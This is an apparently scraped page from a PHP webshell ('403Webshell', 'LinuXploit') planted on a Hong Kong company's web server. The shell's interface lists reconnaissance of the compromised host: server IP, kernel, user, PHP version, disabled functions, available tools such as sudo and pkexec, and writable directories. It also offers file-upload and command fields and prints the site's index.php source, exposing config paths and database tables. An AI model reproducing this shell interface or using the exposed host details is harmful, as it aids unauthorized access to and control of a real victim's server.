403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/c-c.com.hk/en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/c-c.com.hk/en/index.php
<?php require_once('../webadmin/configure.php');
session_start(); 
// SEO 
$result = mysql_query("SELECT * FROM mainmenu WHERE mmpath = 'index.php' ");
$row = mysql_fetch_array($result,MYSQL_ASSOC);
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title><?=$row{'seotitleen'};?></title>
<meta name="keywords" content="<?=$row{'seokeyen'};?>" />
<meta name="description" content="<?=$row{'seodescen'};?>" />
<link rel="stylesheet" type="text/css" href="../css/style.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>

<link rel="stylesheet" type="text/css" href="../css/ddaccordion.css" />
<script type="text/javascript" src="../js/jquery.easing.js"></script>
<script type="text/javascript" src="../js/jquery.accordion.js"></script>

<script type="text/javascript">
	jQuery().ready(function(){	
		jQuery('#navigation').accordion({
			active: false, 
			header: '.head', 
			navigation: true, 
			event: 'mouseover',
			animated: 'easeslide',
			autoheight: true 			
		});
		$('#accordion-1').easyAccordion({ 
				autoStart: true, 
				slideInterval: 3000,
				slideNum:false
		});
	});
</script>

<script type="text/javascript" src="../js/jquery.easyAccordion.js"></script>
<link rel="stylesheet" type="text/css" href="../css/easyAccordion.css" />

<link rel="stylesheet" type="text/css" href="../js/flexcrollstyles.css" />
<script type='text/javascript' src="../css/flexcroll.js"></script>

<script type="text/javascript" src="../js/jquery.jcarousel.pack.js"></script>
<link rel="stylesheet" type="text/css" href="../css/jquery.jcarousel.css" />
<link rel="stylesheet" type="text/css" href="../css/skin.css" />
<script type="text/javascript" src="../js/jCarousel.js"></script>
</head>
<body><?php include_once("analyticstracking.php") ?>
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="140" colspan="2"><a href="index.php"><img src="../images/logo.jpg" width="200" height="80" alt="KARLSON C & C Limited" /></a></td>
  </tr>
  <tr>
    <td align="left" valign="top" id="mainmenubg"><ul id="navigation">
	<?php $result2 = mysql_query("SELECT * FROM mainmenu ORDER BY mmsort ASC ");
			while ($row2 = mysql_fetch_array($result2,MYSQL_ASSOC))	{	
			echo "<li>";
				echo "<a class='head' href='".$row2{'mmpath'}."'>".$row2{'mmtitleen'}."</a>";
				if ($row2{'mmid'} == '2') {
					echo "<ul>\n";
						$result3 = mysql_query("SELECT * FROM project_cat WHERE pjcatstatus = '1' ORDER BY pjcatsort ASC ");
						while ($row3 = mysql_fetch_array($result3,MYSQL_ASSOC))	{	
						echo "<li><a href='".$row2{'mmpath'}."?pjcatid=".$row3{'pjcatid'}."'>".$row3{'pjcattitleen'}."</a></li>\n";
						}
					echo "</ul>\n";
				}
			echo "</li>\n";			
			} 
	?></ul></td>
    <td width="800" height="350" align="left" valign="top"><?php $result4 = mysql_query("SELECT * FROM h_slideshow WHERE hsstatus = '1' ORDER BY hssort ASC ");
			if(mysql_num_rows($result4) > 0 ){ 
			?><div id="accordion-1">
            <dl class="easy-accordion">
			<?php $x=1; $a=0;while ($row4 = mysql_fetch_array($result4,MYSQL_ASSOC))	{ 
				if ($x == '1') {
					echo '<dt style="width: 230px; top: 99.5px; margin-left: -99.5px; left: '.$a.'px; " class="style'.$x.' active">'.$row4{'hstitleen'}.'</dt>';
                	echo '<dd style="width: 470px; height: 193px; display: block; " class="active"><a href="'.$row4{'hshyperlinken'}.'"><img src="../slideshow/'.$row4{'hsimage'}.'" alt="'.$row4{'hstitleen'}.'" /></a></dd>';
				} else {
					echo '<dt style="width: 230px; top: 99.5px; margin-left: -99.5px; left: '.$a.'px; " class="style'.$x.'">'.$row4{'hstitleen'}.'</dt>';
                	echo '<dd style="width: 470px; height: 193px; display: none; " class=""><a href="'.$row4{'hshyperlinken'}.'"><img src="../slideshow/'.$row4{'hsimage'}.'" alt="'.$row4{'hstitleen'}.'" /></a></dd>';
				}
				$x++;
				$a = $a+66;
			 } ?>
                
            </dl>
        </div><?php } ?></td>
  </tr>
  <tr>
    <td colspan="2" id="footer" class="footer">Copyright © KARLSON C & C Limited. All Copyright Reserved.</td>
  </tr>
</table>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit